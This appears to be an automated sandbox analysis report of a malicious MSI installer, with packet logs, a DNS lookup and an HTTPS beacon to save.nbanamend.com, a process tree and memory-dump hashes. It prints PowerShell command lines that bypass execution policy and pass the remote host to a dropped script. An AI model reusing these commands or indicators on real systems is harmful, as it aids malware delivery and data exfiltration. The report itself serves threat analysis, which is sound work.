                                                Nov 23, 2021 21:01:51.920614958 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920633078 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920663118 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920679092 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920681000 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920727015 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920727968 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920758963 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920778036 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920793056 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920805931 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920809031 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920866966 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920931101 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.920969009 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.920988083 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921003103 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921036005 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921041012 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921061039 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921072960 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921089888 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921107054 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921108007 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921124935 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921143055 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921154976 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921159029 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921181917 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921184063 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921200037 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.921231985 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921382904 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.921396017 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922137022 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922156096 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922168970 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922185898 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922199011 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922211885 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922218084 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922230005 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922243118 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922247887 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922265053 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922288895 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922300100 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922317982 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922318935 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.922336102 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.922363997 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923341036 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923358917 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923374891 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923393011 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923408985 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923424959 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923419952 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923475027 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923599005 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923618078 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923635006 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923650980 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923669100 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923671961 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923685074 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923702002 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.923706055 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923734903 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.923763037 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924022913 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924047947 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924087048 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924104929 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924120903 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924149990 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924179077 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924182892 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924201012 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924217939 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924236059 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924251080 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924282074 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924313068 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924315929 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924335957 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924349070 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924381018 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924763918 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924782038 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924865007 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924868107 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924886942 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924902916 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924912930 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924947977 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.924963951 CET497889001192.168.2.5213.226.71.164
                                                Nov 23, 2021 21:01:51.924999952 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925035000 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925051928 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925065041 CET900149788213.226.71.164192.168.2.5
                                                Nov 23, 2021 21:01:51.925081968 CET900149788213.226.71.164192.168.2.5

                                                UDP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 23, 2021 21:01:33.114343882 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
                                                Nov 23, 2021 21:01:33.141047001 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5

                                                DNS Queries

                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                Nov 23, 2021 21:01:33.114343882 CET | 192.168.2.5 | 8.8.8.8 | 0x317b | Standard query (0) | save.nbanamend.com | A (IP address) | IN (0x0001)

                                                DNS Answers

                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Nov 23, 2021 21:01:33.141047001 CET | 8.8.8.8 | 192.168.2.5 | 0x317b | No error (0) | save.nbanamend.com | | 104.21.91.13 | A (IP address) | IN (0x0001)
                                                Nov 23, 2021 21:01:33.141047001 CET | 8.8.8.8 | 192.168.2.5 | 0x317b | No error (0) | save.nbanamend.com | | 172.67.207.76 | A (IP address) | IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • save.nbanamend.com

                                                HTTPS Proxied Packets

                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.5 | 49770 | 104.21.91.13 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                2021-11-23 20:01:33 UTC | 0 | OUT | GET /new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                Host: save.nbanamend.com
                                                Connection: Keep-Alive
                                                2021-11-23 20:01:33 UTC | 0 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 23 Nov 2021 20:01:33 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                vary: Accept-Encoding
                                                CF-Cache-Status: DYNAMIC
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YnAHG933GUSGLRY88lgAcLSgezTFkcd1GNyN2E%2FUc7xIcWG8Mz8Kpkn9eIpQdqFh3hw6lwuMc%2Fa5Hdfak2W%2FTfTKycAxDa4htd6NY%2BMiITxolejbymcQE5lozMCfR%2F6EQkYLd00%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 6b2cfd772d5942db-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                2021-11-23 20:01:33 UTC | 0 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Memory Usage

                                                High Level Behavior Distribution

                                                Behavior

                                                System Behavior

                                                General

                                                Start time:21:00:30
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\msiexec.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\YwZpT3p5Rh.msi"
                                                Imagebase:0x7ff784ee0000
                                                File size:66048 bytes
                                                MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:21:00:30
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\msiexec.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                Imagebase:0x7ff784ee0000
                                                File size:66048 bytes
                                                MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:21:00:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300
                                                Imagebase:0xd0000
                                                File size:59904 bytes
                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:21:00:42
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                Imagebase:0x3f0000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Start time:21:00:43
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7ecfc0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:21:01:30
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
                                                Imagebase:0x9f0000
                                                File size:147456 bytes
                                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:21:01:33
                                                Start date:23/11/2021
                                                Path:C:\JQHPQS\MRZANK.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
                                                Imagebase:0xc30000
                                                File size:4229632 bytes
                                                MD5 hash:67AB12CF6CABC14588E4F51B21C2134A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Start time:21:01:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7ecfc0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:21:01:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
                                                Imagebase:0x3f0000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Start time:21:01:34
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7d3970000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                General

                                                Start time:21:01:39
                                                Start date:23/11/2021
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
                                                Imagebase:0x7ff6381b0000
                                                File size:163840 bytes
                                                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                General

                                                Start time:21:01:42
                                                Start date:23/11/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                Imagebase:0x3f0000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET

                                                General

                                                Start time:21:01:43
                                                Start date:23/11/2021
                                                Path:C:\JQHPQS\MRZANK.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
                                                Imagebase:0xc30000
                                                File size:4229632 bytes
                                                MD5 hash:67AB12CF6CABC14588E4F51B21C2134A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Disassembly

                                                Code Analysis

                                                  Executed Functions

                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 028C4DA8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.396912797.00000000028C0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: false

                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 028C4DA8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.396912797.00000000028C0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: false

                                                  Non-executed Functions

                                                  Executed Functions

                                                  APIs
                                                  • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 077AFD60
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547799951.00000000077A0000.00000040.00000010.sdmp, Offset: 077A0000, based on PE: false

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0778F987,00000000,00000000,00000003,00000000,00000002), ref: 0778FA92
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547675806.0000000007780000.00000040.00000001.sdmp, Offset: 07780000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0778F987,00000000,00000000,00000003,00000000,00000002), ref: 0778FA92
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547675806.0000000007780000.00000040.00000001.sdmp, Offset: 07780000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e60b5f13abfc9ab945658a2d44ddb208aac292dc19a450f78b8ba33ecbbb17f7
                                                  • Instruction ID: 50aeac6a81c27d9a1a47c16f16a564a35487532919805f021ba6f0dca74e999a
                                                  • Opcode Fuzzy Hash: e60b5f13abfc9ab945658a2d44ddb208aac292dc19a450f78b8ba33ecbbb17f7
                                                  • Instruction Fuzzy Hash: D0427DB4A00205CFCB05DFA8C9989ADBBF2FF89354B1585A9E8459B365DB30EC45CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 818a6837856e14edf9970d670dd3d53fc925eb8fa14962c306e29636e3f55b24
                                                  • Instruction ID: 75385ca939da1641e3b141297918d4cbf619d015a2400d19e6984bfdb967afd5
                                                  • Opcode Fuzzy Hash: 818a6837856e14edf9970d670dd3d53fc925eb8fa14962c306e29636e3f55b24
                                                  • Instruction Fuzzy Hash: 70F139B4A00209CFCB55DFA8C58899DBBF2FF89354B1185A9E849AB365DB30EC45CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0cb925052d77d703579cc16412eabaea41b226b9c3f9353817f9d8f623fcde0b
                                                  • Instruction ID: 7e1bae7da8d58c95df092c70f958322859c55b61e35954598b3c6400723f1f4c
                                                  • Opcode Fuzzy Hash: 0cb925052d77d703579cc16412eabaea41b226b9c3f9353817f9d8f623fcde0b
                                                  • Instruction Fuzzy Hash: 10C19FB5B002059FCB18CF68D498AADBBF2EF48354F148869E916DB3A5CB35EC40CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42bc260b7d3b176a1cd5594f0b0d1a59667d88bacfebb2a6982ce624fbe8b370
                                                  • Instruction ID: b12f4383f1811ed7b9efd5e587751ae662ded4266540a958e1a9a2368101fd3d
                                                  • Opcode Fuzzy Hash: 42bc260b7d3b176a1cd5594f0b0d1a59667d88bacfebb2a6982ce624fbe8b370
                                                  • Instruction Fuzzy Hash: F4E16E70A0070ACFCB15EFB4C85469AB7B2FF85354F108A99D949AB254EF70E985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a91e4dd03dc8fbd0565c105a0e632d19db09bb919219e109533adc24ace413b
                                                  • Instruction ID: e4fd3e7e814d3c9a49b576d875d271f4ba090493466c19eb5cf0bf466725945d
                                                  • Opcode Fuzzy Hash: 4a91e4dd03dc8fbd0565c105a0e632d19db09bb919219e109533adc24ace413b
                                                  • Instruction Fuzzy Hash: 9ED128B4A00205CFCB55DFA8C98896DBBF2FF89354B1185A9E8459B365EB30EC45CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fefd7f457a0a728dcad93694902cbf079ce6b521dfaf523d3f94008e5c1bf38
                                                  • Instruction ID: bc1f8c71bfa192e85b9bda1eff8d7bfa542e68071e3090d168c5d53c9d2c0f7b
                                                  • Opcode Fuzzy Hash: 6fefd7f457a0a728dcad93694902cbf079ce6b521dfaf523d3f94008e5c1bf38
                                                  • Instruction Fuzzy Hash: 6E91E7B8A00219DFDB14DFA8C598EADBBF2AF49754F144858E806AB365CB71EC41CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c83e102cc6b91ed53651e9d36a479556f3238e8a99ba4282b47318ff6905a250
                                                  • Instruction ID: ace0c5eeb2b3524e29d46e39f18498f4b64e05a3a25c7ba90cea18bef67c97f3
                                                  • Opcode Fuzzy Hash: c83e102cc6b91ed53651e9d36a479556f3238e8a99ba4282b47318ff6905a250
                                                  • Instruction Fuzzy Hash: 1451D6B8A00219CFDB14DFA4C598AADBBF6AF49355F144458E806AB364DB70EC42CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 024ba0b0c4c02c566790dc494a87eb76ff8ab7053698186627f87508fe401d83
                                                  • Instruction ID: 0c23e7b90ef7aa8e402d551d686ee8f188a3942ec555f0f98b728ccfe6443cbd
                                                  • Opcode Fuzzy Hash: 024ba0b0c4c02c566790dc494a87eb76ff8ab7053698186627f87508fe401d83
                                                  • Instruction Fuzzy Hash: 0351ACB090070ACFDB21DF64C88869AF7B1FF45344F208A6AD885BB255DB70E985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96dcd40e9b095b35bcb7052b2ce1cf83d75de32624804ac8924c399ed70adb33
                                                  • Instruction ID: 9d2dcc3fb5a49a2ca9c738e9312e7748b36bfadeb964c5ce2380f840ed36caa9
                                                  • Opcode Fuzzy Hash: 96dcd40e9b095b35bcb7052b2ce1cf83d75de32624804ac8924c399ed70adb33
                                                  • Instruction Fuzzy Hash: D9312AF9A043448FDB1A9A78C81C6DD7BB6BF47650F0548EAD841EF6A6C6608C81C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8187dd6e480669035f80b752ad70d2bbc055ad89734dd2894c17feacee9507d
                                                  • Instruction ID: a1c34fec514b36d5a5ad2211c464a417d15d1d1485ab314407e521f2160b8c4c
                                                  • Opcode Fuzzy Hash: b8187dd6e480669035f80b752ad70d2bbc055ad89734dd2894c17feacee9507d
                                                  • Instruction Fuzzy Hash: 8B41E874B002499FCB10DF65C488ADEBBF2AF89354F548868D845AB755DB30EC45CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5591842aea0ec55858856efac7b325b728bcc655d3728ab186dfb99fa7ceb4bc
                                                  • Instruction ID: cf117930773fd18079fed3b094196d84f0d5986e2ad0bd6873f60b0dba0c0173
                                                  • Opcode Fuzzy Hash: 5591842aea0ec55858856efac7b325b728bcc655d3728ab186dfb99fa7ceb4bc
                                                  • Instruction Fuzzy Hash: 903126B5F042058FCB19AABCD4186EE73B6DF85295F14886AD802DB3A4CF34CC41CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c750cd5be7af27f8f224c17fd44ddc5021ac5491737789221aff8630825bc41
                                                  • Instruction ID: 23f7608fd1a8989428157936958d80b14c0583e4e4fb3a1a1294780b4db8ebc4
                                                  • Opcode Fuzzy Hash: 3c750cd5be7af27f8f224c17fd44ddc5021ac5491737789221aff8630825bc41
                                                  • Instruction Fuzzy Hash: 6E419374B002099FCB14DFA9C588A9EBBF7AF88354F548868D845AB755EB30EC45CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe7233f3176735a71983dbe7dbd13a4bc59aef36e9fa6866695c1cc351189d2b
